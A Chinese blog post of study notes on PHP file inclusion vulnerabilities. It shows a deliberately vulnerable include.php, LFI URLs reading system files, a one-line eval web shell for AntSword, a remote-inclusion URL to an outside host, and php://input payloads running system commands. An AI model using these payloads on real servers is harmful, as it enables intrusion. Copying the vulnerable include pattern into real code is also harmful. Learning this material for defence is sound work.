文件包含漏洞学习笔记

于 2023-03-25 23:17:58 发布
阅读量522 收藏
点赞数
分类专栏: 问题及示例 安全 文章标签: 学习 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoxiao_renhe/article/details/129773864
版权

1、为何会出现文件包含漏洞

相同内容或方法在多个页面显示或调用,文件包含漏洞又称为目录遍历漏洞或任意文件访问漏洞。分为本地文件包含(LFI:Local File Inclusion),远程文件包含(RFI:Remote File  Inclusion),也可分为静态文件包含,动态文件包含。

2、静态文件包含

页面中直接引用静态文件。

main.php内容如下:

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Home</title>
  </head>	
  <body>
    <h1>这是你第二次访问本网站</h1>
    <p>为何用TextEditor编写的汉字打开就乱码?</p>
    <p>欢迎下次再来!</p>
    <?php include 'footer.php'; ?>
  </body>
</html>

footer.php文件内容如下:

<?php 
header("content-type:text/html;charset=utf-8");
echo "<p>copyright @ 2023-".date("Y")."测试网</p>"; 
?>

静态文件包含效果:

浏览器访问:  http://127.0.0.1/fileinc/main.php?

 3、动态文件包含

被包含的文件通过参数传入,增加了页面包含的灵活性。

include.php文件内容如下:

<?php
    $file = $_GET['file'];
    if(isset($file)){
        include("$file");
    }else{
        echo "file fail!";
    }
?>

动态文件包含效果:

浏览器访问:  http://127.0.0.1/fileinc/include.php?file=footer.php

4、 漏洞利用

可以访问系统敏感文件,也可以包含恶意代码文件或图片码。

漏洞利用效果:

浏览器访问: http://127.0.0.1/fileinc/include.php?file=C:\Windows\system.ini ,访问网站所在服务器的C:\Windows\system.ini中的敏感信息。

shell.php文件内容如下:

<?php
    header("Content-type:text/html;charset=gb1232");
    echo "<pre>";
    @eval($_POST['shell']);
?>

漏洞利用效果:

浏览器访问:  http://127.0.0.1/fileinc/include.php?file=shell.php ,可以通过“中国蚁剑”来访问服务器资源。即利用上传的木马获取服务器shell执行权限。

 5、远程文件包含

 远程文件包含的前提,需要将php.in中如下2个配置选项启用,

allow_url_fopen=On,allow_url_include=On

远程文件包含效果:

浏览器访问:http://127.0.0.1/fileinc/include.php?file=http://remote.include.com/fileremote/info.php ,这个远程文件可以是获取phpinfo信息,也可以是一句话木马……

 6、涉及到的文件包含函数

include()                          包含并运行指定文件

include_once()                只包含一次,不重复包含

require()                          和include()一样,不过出错时会停止

require_once()                和include_once()一样,不过出错时会停止

fopen()                             打开文件或者url

readfile()                           读取文件并写入到输出缓冲

highlight_file()                  语法高亮一个文件

show_source()                 语法高亮一个文件

file_get_contents()           将整个文件读入一个字符串

file()                                   把整个文件读入一个数组中

7、涉及到的PHP伪协议

file://        访问本地文件系统

http://       访问http或https网址

ftp://          访问ftp或ftps网址

php://       访问各个输入或输出流(I/O Streams)

zlib://         访问压缩流

data://        访问数据(RFC 2397)

glob://        查找匹配的文件路径模式

phar://        PHP归档

ssh2://       安全外壳协议2

rar://           RAR

ogg://         音频流

expect://    处理交互式的流

使用说明请参考:https://www.php.net/manual/zh/wrappers.php

注意:

php://input 可以使用抓包工具,添加输入流信息(如:<?php system('ls /'); ?> 或 <?= system(cat /filename); ?> 或 <?= `ls /`; ?>)。

XiaoXiao_RenHe
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP各类功能实现(笔记
Tianyi_liang的博客
04-20 578
------------------------------------------ 2017 ------------------------------------------- PHP file lock 一个完整的防文件冲突的读取过程应该是: $file = 'test.txt'; $fp = fopen($file, 'a'); // 打开文件 if(fl...
web渗透测试----5、暴力破解漏洞
七天
12-17 1087
文章目录一、前言二、DVWA-暴力破解三、验证码暴力破解 一、前言 暴力破解:攻击者可以利用字典不断进行枚举,破解用户的账号名和密码。 常用的暴力破解工具:burpsuite、hydra等。 二、DVWA-暴力破解 以DVWA的brute force为例** 1、Low 代码如下: <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get pas
isset php 二维数组_浅析PHP反序列化漏洞
weixin_39982580的博客
12-28 321
0x01 前言很久没有些文章了,今天复习了反序列化漏洞的知识,顺便写了一篇文章。0x02 PHP序列化和反序列化基础我们想要将数组值存储到数据库时,就可以对数组进行序列化操作,然后将序列化后的值存储到数据库中。其实PHP序列化数组就是将复杂的数组数据类型转换为字符串,方便数组存库操作。对PHP数组进行序列化和反序列化操作,主要就用到两个函数,serialize和unserialize。PHP序列化...
详解文件包含漏洞
LYJ20010728的博客
05-28 1166
详解文件包含漏洞什么是文件包含文件包含漏洞成因php引发文件包含漏洞的四个函数文件包含漏洞的类型本地文件包含无任何限制限制包含文件的后缀名Session文件包含漏洞 什么是文件包含 为了更好地使用代码的重用性,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码,简单点来说就是一个文件里面包含另外一个或多个文件 文件包含漏洞成因 文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码 例如:$_GET['filename']没
【渗透测试】命令执行漏洞
ssrf
08-07 829
一、原理 程序员使用脚本语言如PHP开发应用过程中,脚本语言开发十分快速、简洁、方便,但是也伴随着一些问题。比如说速度慢,或者无法接触到系统底层,如果我们开发的应用,特别是企业级的应用需要去调用一些外部程序。当应用需要调用一些外部程序时就会用到一些系统命令函数。 应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入的情况下,就会造成命令执行漏洞。 二、漏洞危害 继承web 服务器权限,去执行系统命令 继承web 服务器权限,读写文件 反弹shell
Webgoat学习笔记.zip
03-12
3. 文件包含漏洞:研究如何通过文件包含漏洞执行任意代码,学习限制文件包含功能,使用安全的相对路径或白名单机制来防范。 4. 认证与会话管理:掌握弱密码策略、会话固定、会话劫持等问题,学习使用强认证机制和...
渗透学习笔记
12-30
这份名为"渗透学习笔记"的压缩包包含了多个文本文件,涵盖了渗透测试中的一些关键领域,如MySQL注入、CMS探测、数据库探测等。以下是这些知识点的详细说明: 1. **MySQL手注大全.txt**: MySQL注入是常见的Web应用...
蓝牙学习笔记
08-05
其中,链路层负责设备之间的连接和数据传输,网络层处理广播和多播,会话层管理不同服务的访问,应用层则包含各种具体的应用规范,如A2DP(高级音频分布配置文件)用于音频流,GATT(通用属性配置文件)用于BLE的...
安全测试学习笔记.pdf
05-28
应对用户上传的文件内容进行审查,防止包含恶意代码。 6. **Session管理**: Session是跟踪用户状态的重要手段,但存在被劫持或篡改的风险。Session数据可以存储在cookie、URL参数或服务器端。存储在cookie中时应...
渗透测试,文件上传漏洞笔记知识梳理图,适用于学习渗透测试初学者学习,仅供参考学习
06-02
4. **图片马**:将Webshell代码嵌入到图片中,配合文件包含漏洞进行利用。 5. **条件竞争**:在高并发环境下,利用后台处理流程中的时间差,使得恶意文件在被删除之前得以保存。 **漏洞发现**常见于用户上传头像、...
文件包含(CTF)
ing_end的博客
04-02 1万+
文件包含 留言 连接数据库 查看留言 连接数据库 登录 连接数据库 注册 连接数据库 代码的重复 留言 查看留言 连接数据库单独的文件 登录 注册 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以
CTFshow刷题日记-WEB-文件包含
Love&Share
09-04 4169
文件包含专题 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 依旧是代码审计类型 直接伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php ?file=data://text/plain,<?php system("nl flag.php");
PHP的isset函数使用的坑
知识改变命运!
06-16 2007
今天发现PHP的isset函数不能谨慎使用有个坑背景 背景 今天在写php代码的时候遇到了isset的坑,下面我来介绍一下我的代码 上面代码的意思和我写的业务代码情况一样,为了不会让程序发生变量为定义的错误,我使用了isset函数来做判断,但是正是因为我这样使用了isset函数它却报错了。原因何在呢? 上面的代码我做了改动,改动了13-14行的代码就可以实现我的目的了.下面的图就是 这样就不...
论PHP常见的漏洞
xysoul的专栏
11-14 3480
0x00 前言 里面很多都是像laterain学习到的, 如果能考上cuit的话 自动献菊花了。 0x01 安装的问题 首先拿到一份源码 肯定是先install上。 而在安装文件上又会经常出现问题。 一般的安装文件在安装完成后 基本上都不会自动删除这个安装的文件 我遇到过的会自动删除的好像也就qibocms了。 其他的基本都是通过生成一个lock文件 来判断程
PHP is_null()与isset()
12-20 2171
由此及彼,这两个函数可以涉及很多。 但这里只是说明一下这两个函数的关系。 很多熟悉PHP的人,可能会用is_null来代替!isset()。 理论上来说,is_null()用来判断一个值是否为null,而用isset()对某个值侦测,如果该变量不存在的话那当然是null,但是在实际写码当中,我做了下面的一个页面启动类。 namespace www\user\center; use Ref
网络安全之反序列化漏洞
qq_52074678的博客
05-11 843
一·PHP类与对象 类Class 一个共享相同结构和行为的对象的集合 <?php class MyClass{ var $var1; var $var2 ="constant string"; function myfunc ($arg1,$arg2){ [......] } [....] } ?> 类的实例 $baidu = new Site; $kitty = new Cat; $benz = new Car; 二
本地文件包含漏洞详解
热门推荐
发哥微课堂
06-14 2万+
0x00:漏洞定义 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 文件包含分为两种,一种为本地文件包含,一种为远程文件包含,此篇记录本地文件包含。本地文件包含(Local File Include),简称 LFI。 0x01:涉及函数 文件包含在 php 中,涉及到的危险函数有四个,分别是 inclu...
记录第一次ctf比赛
姜小孩的博客
10-11 1180
第一关是在根据题目提示是在F12里一开始漫无目的的寻找,回头再看看题的时候发现他有提示:看到这都还没找到,有点蠢……然后便往回找,最终找到,第一道题看来是给出的礼物hhhhhhhh 第二关是题目提示是菜刀,但是习惯用蚁剑的我便开始了我的蚁剑之旅,点开环境大大的写着密码是wllm,我非常不好意思的直接连接,找到了flag第二关结束 第三关的题目提示是基操,给我看的蒙蒙的,点开环境仔细读代码原来是让post传id=wllm然后get传json其中json需要用json格式,代码如下: <?php h
032-内网横向移动学习备忘录1
最新发布
08-04
- ** Cobalt Strike**:一套高级的渗透测试工具,包含Beacon代理,可用于持久化控制、内网探测和横向移动。 为了防御此类攻击,企业应加强网络安全措施,包括: - **及时更新和打补丁**:确保所有系统都运行最新的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值